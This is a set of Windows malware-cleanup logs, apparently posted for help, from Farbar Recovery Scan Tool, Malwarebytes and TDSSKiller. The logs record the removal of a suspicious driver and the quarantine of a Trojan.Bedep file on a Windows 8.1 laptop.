2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-30 19:52 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-30 20:12 - 01188204 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-30 20:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-30 19:56 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-30 19:02 - 2014-11-21 04:34 - 00871062 _____ C:\WINDOWS\PFRO.log
2015-07-30 19:02 - 2013-08-22 10:46 - 00298565 _____ C:\WINDOWS\setupact.log
2015-07-30 19:02 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-30 19:02 - 2013-08-22 09:25 - 01048576 ___SH C:\WINDOWS\system32\config\BBI
2015-07-30 19:01 - 2014-12-13 13:42 - 00000000 ___HD C:\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}
2015-07-30 18:25 - 2013-06-06 22:42 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-30 17:48 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-29 20:44 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-29 20:40 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-28 17:09 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-30 19:13
 
==================== End of log ============================
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:30-07-2015
Ran by Richie (2015-07-30 17:45:56) Run:2
Running from C:\Users\Richie\Desktop
Loaded Profiles: Richie (Available Profiles: Richie)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
AlternateDataStreams: C:\WINDOWS\system32\Drivers\vfrrubmu.sys:changelist
C:\WINDOWS\system32\Drivers\vfrrubmu.sys
*****************
 
C:\WINDOWS\system32\Drivers\vfrrubmu.sys => moved successfully.
vfrrubmu => service removed successfully
"C:\WINDOWS\system32\Drivers\vfrrubmu.sys" => ":changelist" ADS not found.
"C:\WINDOWS\system32\Drivers\vfrrubmu.sys" => File/Folder not found.
 
==== End of Fixlog 17:45:56 ====
 
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 7/30/2015
Scan Time: 5:49 PM
Logfile: MBAM73015.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.07.30.05
Rootkit Database: v2015.07.29.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: Richie
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342067
Time Elapsed: 53 min, 42 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Trojan.Bedep.64, C:\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll, Quarantined, [826bcd1aa9e187af6ab73e7aa55ca25e], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
20:01:50.0324 0x07fc  TDSS rootkit removing tool 3.1.0.5 Jul 24 2015 12:29:57
20:01:50.0324 0x07fc  UEFI system
20:02:05.0137 0x07fc  ============================================================
20:02:05.0137 0x07fc  Current date / time: 2015/07/30 20:02:05.0137
20:02:05.0137 0x07fc  SystemInfo:
20:02:05.0137 0x07fc  
20:02:05.0137 0x07fc  OS Version: 6.3.9600 ServicePack: 0.0
20:02:05.0137 0x07fc  Product type: Workstation
20:02:05.0137 0x07fc  ComputerName: RICHIE
20:02:05.0137 0x07fc  UserName: Richie
20:02:05.0137 0x07fc  Windows directory: C:\WINDOWS
20:02:05.0137 0x07fc  System windows directory: C:\WINDOWS
20:02:05.0137 0x07fc  Running under WOW64
20:02:05.0137 0x07fc  Processor architecture: Intel x64
20:02:05.0137 0x07fc  Number of processors: 2
20:02:05.0137 0x07fc  Page size: 0x1000
20:02:05.0137 0x07fc  Boot type: Normal boot
20:02:05.0137 0x07fc  ============================================================
20:02:15.0137 0x07fc  KLMD registered as C:\WINDOWS\system32\drivers\00497482.sys
20:02:15.0574 0x07fc  System UUID: {6E1B4100-1740-6274-E519-749EB32D096C}
20:02:16.0699 0x07fc  Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
20:02:16.0715 0x07fc  ============================================================
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0:
20:02:16.0715 0x07fc  GPT partitions:
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition1: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {527654E6-355D-4D23-B23C-07A508122EDD}, Name: Basic data partition, StartLBA 0x800, BlocksNum 0xC8000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition2: GPT, TypeGUID: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}, UniqueGUID: {5905A1D1-2B57-4313-97E1-C6245BB70652}, Name: EFI system partition, StartLBA 0xC8800, BlocksNum 0x82000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition3: GPT, TypeGUID: {E3C9E316-0B5C-4DB8-817D-F92DF00215AE}, UniqueGUID: {A43CD64E-5D8A-4DF8-9926-EB2BA0CB4C71}, Name: Microsoft reserved partition, StartLBA 0x14A800, BlocksNum 0x40000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition4: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {60C8978A-209E-44C8-BE7D-80D75D1DABD0}, Name: Basic data partition, StartLBA 0x18A800, BlocksNum 0x222FA000
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition5: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {52418E1D-4081-4874-B79A-83D3C7FA2A01}, Name: , StartLBA 0x22484800, BlocksNum 0xE1800
20:02:16.0715 0x07fc  \Device\Harddisk0\DR0\Partition6: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {3188E610-2894-4741-AF27-EE86920D51F5}, Name: Basic data partition, StartLBA 0x22566000, BlocksNum 0x2EC8800
20:02:16.0715 0x07fc  MBR partitions:
20:02:16.0715 0x07fc  ============================================================
20:02:16.0746 0x07fc  C: <-> \Device\Harddisk0\DR0\Partition4
20:02:16.0793 0x07fc  D: <-> \Device\Harddisk0\DR0\Partition6
20:02:16.0793 0x07fc  ============================================================
20:02:16.0793 0x07fc  Initialize success
20:02:16.0793 0x07fc  ============================================================
20:02:33.0502 0x0b14  ============================================================
20:02:33.0502 0x0b14  Scan started
20:02:33.0502 0x0b14  Mode: Manual; 
20:02:33.0502 0x0b14  ============================================================
20:02:33.0502 0x0b14  KSN ping started
20:02:33.0549 0x0b14  KSN ping finished: false
20:02:36.0588 0x0b14  ================ Scan system memory ========================
20:02:36.0588 0x0b14  System memory - ok
20:02:36.0588 0x0b14  ================ Scan services =============================
20:02:44.0991 0x0b14  [ 71FE2A48E4C93DDB9798C024880B6C07, 8E93DE29C61A5FA64216231228CB3C4A1A693FE87CAA2C070BCAD7BE2D8ED000 ] bthhfhid        C:\WINDOWS\System32\drivers\BthHFHid.sys
20:02:45.0006 0x0b14  bthhfhid - ok
20:02:45.0131 0x0b14  [ 9307A4B743D277C499CDA8E19E5687AC, 7A01989EC3D54581F292BDEDC9B9445F2ABD50165102617E3089BDD061C63A19 ] BthHFSrv        C:\WINDOWS\System32\BthHFSrv.dll
20:02:45.0163 0x0b14  BthHFSrv - ok
20:02:45.0225 0x0b14  [ EF4B9E7C9AD88C00C18A12B0D22D1894, 672537E75201E690D86CD65252B8AEF887C76EBD37AB0C419462D69164B350CC ] BTHMODEM        C:\WINDOWS\System32\drivers\bthmodem.sys
20:02:45.0241 0x0b14  BTHMODEM - ok
20:02:45.0288 0x0b14  [ 043A0F37631BF453F16D478B71320F46, C368296B802984F438852927B8A40EA3F4205724A05828F3173F08EC17228356 ] bthserv         C:\WINDOWS\system32\bthserv.dll
20:02:45.0319 0x0b14  bthserv - ok
20:02:45.0366 0x0b14  [ 2FA6510E33F7DEFEC03658B74101A9B9, 61C8C8E3F09B427711464C974EE22E1E01C48E10DB54A4EC9901F482FC36C978 ] cdfs            C:\WINDOWS\system32\DRIVERS\cdfs.sys
20:02:45.0366 0x0b14  cdfs - ok
20:02:45.0397 0x0b14  [ C6796EA22B513E3457514D92DCDB1A3D, 2B893F3950C6B913B934C2089B69F3B0B77F229AE1820907E598455CBB78139C ] cdrom           C:\WINDOWS\System32\drivers\cdrom.sys
20:02:45.0428 0x0b14  cdrom - ok
20:02:45.0475 0x0b14  [ 41C0D7B1A6D4AD119BA6AC0487EA5C8E, 516C2B34BA7507D0DA4148B4ABC0A8C36286570D4EA5C60B28647B1249C15018 ] CertPropSvc     C:\WINDOWS\System32\certprop.dll
20:02:45.0506 0x0b14  CertPropSvc - ok
20:02:45.0558 0x0b14  [ BE9936EDD3267FAAFF94A7835867F00B, 3CEEF2377D45ED38C7CD3CE4C746EC5EA7277EFEC728A5438F0EF5F62FC7C859 ] circlass        C:\WINDOWS\System32\drivers\circlass.sys
20:02:45.0574 0x0b14  circlass - ok
20:02:45.0636 0x0b14  [ 8EB7E70C2D348FE2476A2E3F2D585E3D, 2B5D407FACF1D049261026CC552A7C93B028A661B0F4E959815EAE7670054127 ] CLFS            C:\WINDOWS\system32\drivers\CLFS.sys
20:02:45.0668 0x0b14  CLFS - ok
20:02:45.0746 0x0b14  [ 075CCE75090786F124573A788C8656E6, AA188CFF2F8EE2D9F50701AB2315D24E15D7715FD84F5054D3FC175D4BD35734 ] CLVirtualDrive  C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys
20:02:45.0761 0x0b14  CLVirtualDrive - ok
20:02:45.0808 0x0b14  [ EF6EF85DADC3184A10D8F2F7159973CB, 42FCB286CED95A5DEBC5C0C894FCBC4818A2C818BB71087142FB51A08A0BE96B ] CmBatt          C:\WINDOWS\System32\drivers\CmBatt.sys
20:02:45.0824 0x0b14  CmBatt - ok
20:02:45.0902 0x0b14  [ 5E5AB950693F2C6D6ACBEE3A74697ED7, 3790A7DD0AC65F47A697A577744FDFA4CC1CA3422884C84E499F97AC91BA84F3 ] CNG             C:\WINDOWS\system32\Drivers\cng.sys
20:02:45.0949 0x0b14  CNG - ok
20:02:45.0964 0x0b14  [ 03AAED827C36F35D70900558B8274905, 8E44A23C6013FFAE7769F99CAA3B1D6288DE00A38937F9056903AC265B503AFA ] CompositeBus    C:\WINDOWS\System32\drivers\CompositeBus.sys
20:02:45.0980 0x0b14  CompositeBus - ok
20:02:45.0996 0x0b14  COMSysApp - ok
20:02:46.0058 0x0b14  [ A1FF7DFBFBE164CF92603C651D304DD2, 470ACE5A75E64FC62C950037201199857E974803625DC73BEDBCF6FA4DDD496C ] condrv          C:\WINDOWS\system32\drivers\condrv.sys
20:02:46.0058 0x0b14  condrv - ok
20:02:46.0121 0x0b14  [ 6324F0D18FB52833BA64BC828E29054C, 04118FA1BDFC512F76E4A81FEF34C78B6BD98429DB1D65123B6802B4A1E30584 ] CryptSvc        C:\WINDOWS\system32\cryptsvc.dll
20:02:46.0136 0x0b14  CryptSvc - ok
20:02:46.0183 0x0b14  [ 315BA4BC19316D72B2E037534E048B93, 69613635DB23E6A935673B1025C2010ED3E195473D25368CF74234C4C36910BE ] dam             C:\WINDOWS\system32\drivers\dam.sys
20:02:46.0199 0x0b14  dam - ok
20:02:46.0293 0x0b14  [ A6F17C299A03BAFEFB9257C462A19E00, EB68967D28355271897166D7B6FD963D1E546D3C24AE1AEAAC561F94357A9345 ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
20:02:46.0339 0x0b14  DcomLaunch - ok
